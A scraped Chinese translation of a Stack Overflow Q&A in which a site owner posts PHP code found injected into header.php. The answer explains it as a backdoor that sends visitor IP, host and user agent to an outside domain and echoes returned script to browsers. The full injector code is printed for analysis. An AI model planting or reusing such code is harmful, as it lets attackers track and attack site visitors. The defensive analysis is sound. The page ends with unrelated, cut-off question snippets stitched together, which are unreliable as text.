- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
Avast 不时出现在我的一个网站上。有点奇怪,因为我对安全性非常严格,但我检查了 index.php 文件和所有相关的包含和脚本。在我删除的“header.php”文件中发现了一些奇怪的 PHP 代码。
今晚,avast 再次弹出,尽管我的 FTP 数据显示该文件“自从我修复它后就没有被编辑过”,但代码又出现了。我现在已经更改了密码和所有其他内容。
这是有问题的 PHP 代码,任何关于这到底在做什么的建议都会很好!
<?php
$wp_bskr = 'inf';
$wp_tcc = 'template';
error_reporting(0);
ini_set('display_errors',0);
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_hrmr) && !preg_match ('/bot/i', $wp_hrmr))) {
$wp_drss="http://".$wp_tcc.$wp_bskr.".com/".$wp_bskr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hrmr);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_wvw,1,3) === 'scr' ) {
echo $wp_wvw;
}
?>
********* 更新************
感谢 esqew 更深入地研究这个问题并在您的博文中提供详细信息。确实是可怕的东西。我这边有一些更新要告诉你。
首先,使用 avast 日志(从我的网站被检测到有恶意软件时开始),通过谷歌进行一些搜索,我发现了另一个非常相似的代码示例,我这边 avast 标记的 IP 地址与这篇文章相匹配问题。此处提供了一些信息以缩小范围:malware-traffic-analysis.n*t/2014/05/11/index.html.无论如何,我认为那是帖子。论坛的新手,不确定我是否可以发布链接,所以我给“net”顶级域名加了星标。
从那里,我获取了匹配的 IP,一个包含 javascript 的 url,whois'd 并将所有信息传递给注册商。他们从他们那端看了一下,确认存在恶意行为,令我惊讶的是,他们在一个小时内回复并暂停了域和所有连接到该 IP 的域。
其次,我的虚拟主机发现了他们认为泄漏是如何实现的。没有提供完整的深度细节,我意识到我有一个旧的 wordpress 安装(我的意思是旧的,一个我多年没有使用和忘记的,自 2010 年以来没有更新,所以我认为很容易受到攻击)。从他们的日志来看,这似乎是进入我的服务器的方式,因为我没有安装其他脚本。从几天前开始,我更改了所有密码并完全删除了 WP,因为它不再使用并且目前一切正常。
最佳答案
看起来是某种后门,我们可以进一步探索。前几行似乎设置了一些变量,使代码更难阅读/检测:
$wp_bskr = 'inf'; // simple string settings
$wp_tcc = 'template'; // simple string settings
error_reporting(0); // making errors silent, so they are close to undetectable
ini_set('display_errors',0); // making errors silent, so they are close to undetectable
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT']; // grab the user-agent string from the requesting party
然后它会根据这些字符串构建一个 URL:
http://templateinf.com/inf/?...
...其中包含有关您的用户代理、您的 IP 地址和它来自的页面的大量信息。
然后它在 $wp_hrmr
上运行一个正则表达式变量(您的用户代理字符串)来检查它是 Gecko 还是 MSIE 并且不包含“bot”(带有草率、不必要的括号,我已经清理了一下):
if (preg_match('/Gecko|MSIE/i', $wp_hrmr) && !preg_match('/bot/i', $wp_hrmr)) {
如果满足这些条件,它会创建一个 cURL 请求到它之前创建的骨架 URL:
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
然后查看输出,如果它在字符串的特定点包含字符串“scr”,则为 echo
将输出返回给浏览器:
if ( substr($wp_wvw,1,3) === 'scr' ){ echo $wp_wvw; }
根据我个人的判断,这是一个自动化工具放置在那里的东西,要么收集模板的使用统计信息(从 URL 中扣除),要么提醒中央服务器它报告的端点容易受到攻击某些漏洞利用(或者可能是两者的结合)。然而,它似乎还没有混淆到足以证明其被归类为恶意软件的程度,而且它的人类可读性也不足以证明它是合法的。它的错误沉默代码肯定指向前者,但它 有关更多信息,请参阅下面的更新echo
s 输出到缓冲区。无论哪种方式,它都是一段特殊的代码。
然而,这是一个巨大的安全风险,您需要立即联系您的托管服务提供商,因为您的托管网络上可能存在比您的站点更大的问题。虽然这段特殊的代码没有做任何特别恶意的事情,但它仍然是一个风险,应该在您继续执行任何其他操作之前及时处理。
正如@Jonathan 在 OP 的评论中提到的,您网站上出现的任何您未编写的代码都应该接受严格检查。
更新
在 writing this up 之后今晚我正在进行一个博客实验,我在理解这个恶意软件方面取得了长足的进步。
在没有看到您当前的服务器配置的情况下,我很难弄清楚这段代码最初是如何进入您的环境的。不过,我可以肯定地说,这段代码将在未来的某个时候用于大规模 XSS 攻击。
字母scr
提示我 cURL 请求的输出内容最终将包含此字符串,这是过滤不以 <script>
开头的输出的简单方法。 .
一旦攻击者在其端激活包含,服务器很可能会开始使用基于 Javascript 的代码回复请求,并在客户端访问网站时对其进行攻击。攻击者可能正在等待一个广泛传播的 Javascript 引擎错误的发布,他们可以利用这些错误来做比 XSS 更多的恶意事情(可能像远程代码执行)。
如果有足够多的受感染服务器,攻击者就可以利用这些后门来做任何事情:Javascript-based Bitcoin mining , Javascript-based DDOS等
关于PHP Hack - 这段代码在做什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/24374357/
我有一个关于 JavaScript 语法的问题。实际上,我在自学 MEAN 堆栈教程时想出了编码(https://thinkster.io/mean-stack-tutorial#adding-aut
在我的书中它使用了这样的东西: for($ARGV[0]) { Expression && do { print "..."; last; }; ... } for 循环不完整吗?另外,do 的意义何
我已经编写了读取开关状态的代码,如果按 3 次 # 则退出。 void allkeypadTest(void) { static uint8_t modeKeyCount=0; do
因此,对于上周我必须做的作业,我必须使用 4 个 do-while 循环和 if 语句在 Java 中制作一个猜谜游戏。我无法成功完成它,类(class)已经继续,没有为我提供任何帮助。如果有人可以查
int i=1,j=0,n=10,k; do{ j+=i; i<<1; printf("%d\n",i); // printf("%d\n",12<<1); }while
此代码用于基本杂货计算器的按钮。当我按下按钮时,一个输入对话框会显示您输入商品价格的位置。我遇到的问题是我无法弄清楚如何获得 do ... while 循环以使输入对话框在输入后弹出。 我希望它始终恢
当我在循环中修改字符串或另一个变量时,它的条件是否每次都重新计算?或者在循环开始前一次 std::string a("aa"); do { a = "aaaa"; } while(a.size<10)
我刚刚写了这个,但我找不到问题。我使用代码块并编写了这个问题 error: expected 'while' before '{' token === Build finished: 1 errors
do { printf("Enter number (0-6): ", ""); scanf("%d", &Num); }while(Num >= 0 && Num 表示“超过”,<表
我有一个包含 10 个项目的 vector (为简单起见,所有项目都属于同一类,称其为“a”)。我想要做的是检查“A”不是 a) 隐藏墙壁或 b) 隐藏另一个“A”。我有一个碰撞函数可以做到这一点。
嗨,这是我的第二个问题。我有下表 |-----|-------|------|------| |._id.|..INFO.|.DONE.|.LAST.| |..1..|...A...|...N..|.
这个问题在这里已经有了答案: 关闭 12 年前。 Possible Duplicates: Why are there sometimes meaningless do/while and if/e
来自 wikibook在 F# 上有一小部分它说: What does let! do?# let! runs an async object on its own thread, then it i
我在 Real World Haskell 书中遇到了以下函数: namesMatching pat | not (isPattern pat) = do exists do
我有一个类似于下面的用例,我创建了多个图并使用 gridExtra 将它们排列到一些页面布局中,最后使用 ggsave 将其保存为 PDF : p1 % mutate(label2
当我使用具有 for 循环的嵌套 let 语句时,如果没有 (do (html5 ..)),我将无法运行内部 [:tr]。 (defpartial column-settings-layout [&
执行 vagrant up 时出现此错误: anr@anr-Lenovo-G505s ~ $ vagrant up Bringing machine 'default' up with 'virtua
# ################################################# # Subroutine to add data to the table Blas
我想创建一个检查特定日期格式的读取主机。此外,目标是检查用户输入是否正确,如果不正确,则提示应再次弹出。 当我刚接触编程时,发现了这段代码,这似乎很合适。我仍然在努力“直到” do {
我关注这个tutorial在谷歌云机器学习引擎上进行培训。我一步一步地跟着它,但是在将 ml 作业提交到云时我遇到了错误。我运行了这个命令。 sam@sam-VirtualBox:~/models/r
我是一名优秀的程序员,十分优秀!